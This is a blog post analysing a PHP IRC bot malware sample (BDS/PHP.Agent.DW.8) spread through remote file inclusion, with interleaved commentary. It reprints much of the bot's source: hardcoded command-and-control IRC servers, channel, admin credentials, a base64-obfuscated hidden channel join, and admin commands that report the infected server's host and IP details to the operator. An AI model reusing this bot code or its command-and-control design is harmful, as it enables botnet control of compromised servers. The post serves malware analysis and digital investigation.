Today again an RFI infection, the target to dissect is BDS/PHP.Agent.DW.8 that works
as BOT.
/***********************************
/* Guard Cakep Powered By dendy *
/* Female Character *
/* Copyleft Pebruari 2009 *
/* #pangkul @ irc.allnetwork.org *
/* vj_dendy@yahoo.co.id *
/***********************************
/*
/* Perhatian:
/* Joinkan hanya satu Bot dalam satu channel untuk menghindari terjadinya saling sapa antar bot.
/*
/* Perintah Dasar:
/* auth
/* !join [#channel] - Join channel
/* !part [#channel] - Part channel
/* !msg
/* !botnick [nick] [password] - Mengganti nick bot
/* !jump [server] - Mengganti server bot
/* !help - Melihat daftar perintah
/* !ngomong - Memperbolehkan bot untuk berbicara di semua channel
/* !diam - Melarang bot untuk berbicara di semua channel
*/
this bot supports the classical commands linked to irc plus !jump !ngomong and !diam that we
will analyze.
function hajar() {
$channels = '#pangkul'; //Pisahkan tiap channel dengan spasi
$admin = 'VJ_dEnDy';
$bot_password = 'jembod'; //Password untuk auth bot
$ngomong = TRUE; //TRUE, Ngomong. FLASE, Diem.
$autowelcome = TRUE; //TRUE, AutoWelcome On. FLASE, AutoWelcome off.
$versi = "v1.7";
$showresponse = 0; //1, Nampilin respon dari server irc
$localtest = 0; //1, Coba di localhost. 0, connect ke server irc
this reveal all things necessary to a Digital Investigations, indeed we know server, chan and
passwords.
//Nick Bot
$nicklist = array("VJ1","VJ2","VJ3","VJ4","VJ5",
"VJ6","VJ7","VJ8","VJ9","VJ10","VJ11");
$identify = "230283"; //Password Nick Bot
//Ident Bot
$identlist = array("dendy",);
//Realname Bot
$namabot = array("d3ndy",);
//Asl Bot
$aslbot = array("dari chanel pangkul",);
//Pesan Quit
$quitmsglist = array("mau ngintip anak tetangga mandi :D","Bye All..");
other informations for NickBot access
$namaku = $namabot[rand(0,count($namabot) - 1)];
$aslku = $aslbot[rand(0,count($aslbot) - 1)];
there are identities for NickBot as you can see obtained with a Random function.
and here an interesting thing, an array of the various irc servers
if ($localtest == 1) { $remotehost2 = array("localhost"); }
else {
$remotehost2 = array(
"irc.cbn.net.id",
"irc.allnetwork.org",
"irc.elnus.net.id",
"irc.velo.net.id",
"irc.indika.net.id",
"irc.indo.net.id",
"irc.circleone.net.id",
"irc.ads.net.id",
"irc.jmn.net.id",
"202.146.180.46",
"irc.big.net.id",
"irc.sbp.net.id",
);
}
$port = "6667";
successively we have the Welcome Message and Mood List that I'll jump
cause are unuseful for our scopes. Funny a list of bad words
//Special Words
$badwordlist = array("jancuk","babi","puki","s0so","s0s0","sos0","s0h","sosoh","k3h","peller","peler","p4lak","p4l4k","pal4k","#","join di","tae","p3p3k","p3pek","pep3k","m3k","ngengek","p0k","embot","asyu","setan","ancrit","coex","coek","jancox","mencret","cox","jancok","palak","memek","patek","pepek","kontol","anjrit","anjink",
"fuck","entot","ngentot","taek","kelamin","ngesex","ml ","pokeh","anjing",
"poke","tempek","vagina","penis","luji","kodo",);
$pujianlist = array("cantik","baik","baek","cakep","ramah","pengertian","hebat",
"bagus","indah","jujur");
$cacianlist = array("bego","jelek","jelex","gendeng","edan","gilo","gila",
"sinting","dudul","dodol","jahat","goblok","geblek","sialan"," bau","stres");
//Flood Protection Setting
$maxkar = 200; //Maksimal karakter di channel
no more that 200 characters allowed
$helptext = array(
' 3,9? 0,1 ? ¬den¬ dy #pangkul '.$versi.' Help ? 3,9? ',
"-",
" 12auth
" 12deauth - Logout dari bot",
" 12pass
" 12chgpass
" 12adduser
" 12deluser
" 12`auth - Status anda di channel (Channel)",
" 12!auth - Status otorisasi anda",
" 12!act
" 12!slap
" 12!msg
" 12!notice
" 12!ctcp
" 12!ping - Meminta bot untuk membalas dg pong (Channel)",
" 12!info - Melihat info bot (Admin)",
" 12!up - Meminta bot untuk menjadi @ di channel (Channel)",
" 12!down - Meminta bot untuk turun dari @ di channel (Channel)",
" 12!cycle
" 12!part [channel] [alasan] - Part dari channel (Admin)",
" 12!join
" 12!botnick
" 12!k
" 12!kb
" 12!changenick - Ganti nick ke nick internal",
" 12!op
" 12!deop
" 12!v
" 12!dv
" 12!away [alasan] - Meminta nick untuk Away",
" 12!mode
" 12!nickmode
" 12!userlist - Melihat daftar user",
" 12!quit [pesan] - Quit dari IRC (Admin)",
" 12!vhost [vhost] - Mengganti Vhost",
" 12!jump [server] - Mengganti Server bot",
" 12!fullname [nama] - Mengganti Fullname bot",
" 12!topic
" 12!help - Melihat help (Query)",
" 12!ngomong - Mengaktifkan Auto Response",
" 12!diam - Menonaktifkan Auto Response",
" 12!wb
"-",
' 3,9? 0,1 ? By VJ_dEnDy - #pangkul @ irc.allnetwork.org ? 3,9? ',
);
this is the help, and its obviously a good system to know the supported commands.
$nick = $nicklist[rand(0,count($nicklist) - 1)];
$realname = $namaku;
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
$admin = strtolower($admin);
$auth = array(
$admin => array(
"name" => $admin,
"pass" => $bot_password,
"auth" => 1,
"status" => "Admin"
)
);
this choise a random name from nicklist and remotehost list, remotehost, and authentication parameters
composed by name, pass, auth and status that is set to' Admin'
$username = $identlist[rand(0,count($identlist) - 1)];
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
Random identity
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 60);
//Jika koneksi gagal
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp + 1;
hajar();
}
else {
echo ">Ga bisa connect ke $remotehost!";
$keluar = 1;
exit;
}
}
Connect to the remote host
$header = 'NICK '.$nick . CRL;
$header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $header);
$response = "
";
Sends identity to sock
while (!feof($fp)) {
$response .= fgets($fp, 1024);
if ($showresponse == 1) { echo $response."
"; }
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$offsetB = strpos($data, ' :');
$offsetC = strpos($data, '!');
$dFrom = substr($data,1,$offsetA-1);
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
this receive the packet, and the following piece will handle server notifications
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, base64_decode('Sk9JTiAjRmVlTENvTXo=') . CRL);
/*** Notice Bot Admin ***/
fputs($fp, 'NOTICE ' . $admin . ' :Hai Boss!' . CRL);
/*** Join Default Channel ***/
foreach ($channel as $v) { fputs($fp, 'JOIN ' .$v . CRL); }
}
elseif (substr($dCommand,0,3)=='432'){
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
//Nickname is already in use
elseif (substr($dCommand,0,3)=='433'){
$nick = $nicklist[rand(0,count($nicklist) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='465'){
echo "
Authentication diperlukan! Bot ini telah di-autokill.";
$akill = 2;
}
if (substr_count($dNick,'.allnetwork.org') > 0) {
if (substr_count($iText,"*** Banned") > 0) {
echo "BANNED!";
$keluar = 1;
exit;
}
}
/*** AI PHP BOT SCRIPT VJ_dEnDy ***/
$dcom = explode(" ", $dCommand);
if ($dcom[0]=='JOIN') {
/*** Auto Welcome by VJ_dEnDy ***/
$ada = FALSE;
if ($autowelcome) {
$jchan = ltrim($iText,":");
foreach ($nickwb as $v){
$trtext = strtolower($v[0]);
if (substr_count(strtolower($dNick),$trtext) > 0) {
sleep(3);
fputs($fp,'PRIVMSG '.$jchan.' :'.$v[1]. CRL);
$ada = TRUE;
}
}
}
if (($autowelcome) && ($dNick != $nick)) {
if(!$ada) {
$jchan = ltrim($iText,":");
$webe = $wbmsg[rand(0,count($wbmsg) - 1)];
$webe = str_replace("
$webe = str_replace("
$webe = str_replace("#","",$webe);
sleep(5);
fputs($fp,'PRIVMSG '.$jchan.' :'.$webe . CRL);
}
}
}
if ($dcom[0]=='PRIVMSG') {
/*** Auto Response by VJ_dEnDy ***/
if ($ngomong) {
$teman = FALSE;
if (in_array($dNick,$nicklist)) {
$teman = TRUE;
}
enable autoresponse in case of private message, BOT handles also the following events
- Good Reply
- Bad Reply -> Kick
- Protection Against Flood
some interesting command
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).base64_decode("VkVSU0lPTiBGZWVMQ29NeiBBSSBQSFBCb3QgU2NyaXB0IEJ5IF
J
vTno=").chr(1) . CRL);
Decoded: VERSION FeeLCoMz AI PHPBot Script By RoNz
elseif ($com[3]==':!info') {
if ($auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bip = $_SERVER['SERVER_ADDR'];
$bphp = $_SERVER['PHP_SELF'];
$bruri = $_SERVER['REQUEST_URI'];
$brip = $_SERVER['REMOTE_ADDR'];
$brport = $_SERVER['REMOTE_PORT'];
fputs($fp,"NOTICE $dNick :Host: $bhost | Script: $bphp | Referer: $bruri | IP: $bip | Your IP: $brip Port:$brport" . CRL);
This is the reply in case of an Admin send !info
and here other two commands that can use only Admin, !vhost and !jump that selects randomly
a remotehost
elseif ($com[3]==':!vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':!jump' && $auth["$dNick"]["status"]=="Admin") {
if (empty($com[4])) {
$remotehost = $remotehost2[rand(0,count($remotehost2) - 1)];
}
This BOT infects a large ammount of servers actually..
See you to the next post.. :)
Post
1 commenti:
Nice blog! Really liked this post.
Too bad the blog is in italian (I think, maybe spanish?).
will follow it soon. well done.
Posta un commento